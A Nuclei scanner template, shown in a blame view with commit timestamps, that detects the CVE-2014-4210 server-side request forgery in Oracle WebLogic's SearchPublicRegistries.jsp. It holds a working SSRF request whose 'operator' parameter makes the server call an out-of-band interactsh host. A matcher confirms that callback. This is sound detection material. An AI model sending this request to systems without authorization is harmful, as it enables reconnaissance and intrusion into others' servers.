nuclei-templates/cves/2014/CVE-2014-4210.yaml

28 lines
1.0 KiB
YAML
Raw Normal View History

2021-04-23 13:21:52 +00:00
id: CVE-2014-4210
2021-04-23 13:03:54 +00:00
info:
2021-04-23 13:21:52 +00:00
name: Weblogic SSRF in SearchPublicRegistries.jsp
2021-04-23 13:03:54 +00:00
author: princechaddha
severity: medium
2021-10-18 20:40:26 +00:00
tags: cve,cve2014,weblogic,oracle,ssrf,oast
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
2021-04-23 13:03:54 +00:00
requests:
- method: GET
path:
2021-09-12 14:52:03 +00:00
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"
2021-04-23 13:21:52 +00:00
2021-04-23 13:03:54 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-04-23 13:21:52 +00:00
2021-04-23 13:03:54 +00:00
- type: word
2021-09-12 14:52:03 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2021-04-23 13:03:54 +00:00
words:
2021-09-12 14:52:03 +00:00
- "http"